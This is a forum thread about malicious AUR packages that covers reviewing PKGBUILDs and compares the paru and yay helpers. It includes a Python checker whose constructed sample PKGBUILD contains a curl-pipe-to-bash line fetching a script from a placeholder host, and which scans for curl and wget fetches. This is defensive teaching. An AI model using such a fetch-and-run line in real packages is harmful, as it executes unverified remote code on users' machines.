A reminder

There are things happening in the AUR:

I personally do believe that those packages hadn’t been installed that often, because you would have to actively search and install them, but it shows the dark side of the AUR once again.

For those that have missed it, this was what happened.

Old news, not the first time, caught and removed … always read PKGBUILDs and don't rely on auto-builders like Chaotic.

It's an open repo where the public can freely upload.

If you use that blindly then you are asking for trouble.

Is there any kind of scanner that one can use to scan AUR packages before installing them?

You need to use your eyes, and I mean that in the kindest sense. The safest way to establish what you're installing is:

  • What do the diffs say? Have a look at the source if you’re able to understand the basics.
  • Is it a new package? Does it have many votes?
  • Do you need the package? Can it be found in extra?

The one between your eyes should be able to understand that a PKGBUILD pulling data from a suspicious URL such as megaupload isn't a source you want to trust.

In other words, it’s not that simple to recognize for a novice.
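A static check in the spirit of the advice above (look at what the PKGBUILD actually fetches), added here as an example and not code from this thread or from any AUR helper: it parses the PKGBUILD as text, never sourcing it (sourcing executes it), and flags plain-http sources, source hosts that differ from the upstream url, SKIP checksums and network fetches inside build functions. The sample PKGBUILD, its package name and its hostnames are constructed placeholders.

```python
import re
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"https", "git+https"}
# Constructed sample for this example; package name and hostnames are placeholders.
SAMPLE_PKGBUILD = """\
pkgname=example-browser-bin
pkgver=1.2.3
url="https://example.org/example-browser"
source=("$pkgname-$pkgver.tar.gz::http://files.example-mirror.net/$pkgname-$pkgver.tar.gz"
        "$pkgname.desktop")
sha256sums=('SKIP' 'abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789')
package() {
    curl -s https://files.example-mirror.net/post-install.sh | bash
}
"""

def scalar(text, name):
    """Value of a simple `name=value` assignment (quotes stripped); '' if absent."""
    m = re.search(rf'''^{name}=["']?([^"'\n]*)''', text, re.M)
    return m.group(1) if m else ""

def expand(text, value):
    """Substitute $pkgname/$pkgver (plain and braced) so URLs can be inspected."""
    for var in ("pkgname", "pkgver"):
        value = value.replace("${%s}" % var, scalar(text, var)).replace("$" + var, scalar(text, var))
    return value

def array(text, name):
    """Items of a bash array `name=( ... )`, quotes stripped and variables expanded."""
    m = re.search(rf"^{name}=\((.*?)\)", text, re.S | re.M)
    return [expand(text, t.strip("'\"")) for t in m.group(1).split()] if m else []

def audit_pkgbuild(text):
    """Return human-readable findings; an empty list means none of these red flags fired."""
    findings = []
    upstream = urlparse(scalar(text, "url")).hostname
    for entry in array(text, "source"):
        target = urlparse(entry.split("::", 1)[-1])  # drop the local-filename prefix
        if target.scheme and target.scheme not in ALLOWED_SCHEMES:
            findings.append(f"non-https source: {target.geturl()}")
        if upstream and target.hostname and target.hostname != upstream:
            findings.append(f"source host {target.hostname} differs from upstream {upstream}")
    for sums in ("md5sums", "sha256sums", "b2sums"):
        if "SKIP" in array(text, sums):
            findings.append(f"{sums} contains SKIP: that download is not integrity-checked")
    for m in re.finditer(r"^\s+.*\b(curl|wget)\b.*$", text, re.M):  # fetches outside source=()
        findings.append(f"network fetch inside a function: {m.group(0).strip()}")
    return findings
```

Running `audit_pkgbuild(SAMPLE_PKGBUILD)` on the constructed sample returns four findings; a PKGBUILD that only fetches over https from its own upstream host with real checksums returns none.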

Cool, I'll try to look more carefully at any AUR package.
Just thought (wished even) there might be some scanner that picks up stuff better than my unknowledgeable eyes lol.
Another question: does this only apply to new AUR packages I want to install, or can some f#ckr add malicious code to an existing AUR package that has been installed before on my PC?
Meaning, if I run yay and it updates AUR packages (already installed, obviously), could those be compromised?

Updates to packages are equally at risk. Assume that the AUR is unsafe. The U in AUR stands for User. Literally anybody can contribute to the repository. It’s a great place to get some amazing software, but balance that risk with your genuine needs.

Understood.
This is actually very worrisome…

As the Linux market share increases, so will the threats. One should always be diligent in what they allow on their system. Only install from the AUR if you are confident in what you're doing. However, this is not limited to the AUR, and one should always use caution when putting something on your system.

I don't consider that incident to be that worrisome,
as the community reacted pretty quickly and the related packages have been removed from the AUR, and there were also investigations into other packages which may include malicious code.

Yes, that's the magic of open source in my opinion: stuff gets picked up quickly and fixed. My worry is if remote access were gained and maybe some backdoor was installed before a patch was made.
Maybe I'm just paranoid lol, but I think I should be to some degree because, as was said, threats increase on Linux.
Just kinda wished there were a proper 'antivirus/real-time scanner' for Linux.

There is no need to be worried in case you haven’t actually installed those packages. Their naming was chosen to be similar to browser packages. And usually you wouldn’t have even stumbled upon them.

The only way to be free of risk is to install apps only from the official Arch repos. And even then, you can’t be 100% free of risk.

Having said that, alternative methods for installing apps, tools, kernels, and utilities are there for a reason. They give you the option to either install something not in the official repos or a newer version of the one present in the official repos. People use these methods all the time without issues. Whether AUR, Chaotic AUR, Flatpak, AppImage, themes/icons from the various stores (KDE, GNOME, Cinnamon, etc.)… assume the risk, inspect what you're downloading/installing, enjoy Arch.

As a side note, my personal use case. I am willing to take the risk:

  • Arch repos for most things
  • AUR (for apps not available via Arch)
  • Flatpak (if an app fails or is available no other way)
  • AppImage (as a last resort if something fails or is available no other way)
  • Chaotic AUR (various kernels and Proton for Steam)

Makes me think of some meme I saw the other day:

"I came to Linux because it's secure … now I can't even find my own files"

Something like that lol

Yeah, I too only install from the AUR if it's not available in the Arch repo and I really need the package.
I completely avoid Flatpak, Snap and AppImage.
Never even heard of Chaotic AUR, so that's good since I haven't used it lol.

I've read up a little and paru came up. What are your thoughts on that? paru vs yay?

https://www.slant.co/versus/23118/40125/~yay_vs_paru

edit: just found this thread too, haven't read through it yet; it's from 2021

I personally prefer paru over yay but I wouldn’t say it is “better”. They are very, very similar.

I prefer the way paru implements color and the review of diffs. I also like the implementation of paru -c for safely removing orphans without removing optional dependencies.

From what I've read up on now a bit, it seems paru is "better"; anyhow, that's probably another debate lol.
I've now switched to paru anyway … :innocent:

Both are viable AUR helpers and essentially wrappers around pacman itself.
In comparison to yay, some operations of paru are considered to be unsafe. For instance, paru -Sy in particular could result in an unresolved state that has to be fixed manually via pacman directly. But you should be fine when avoiding this option altogether.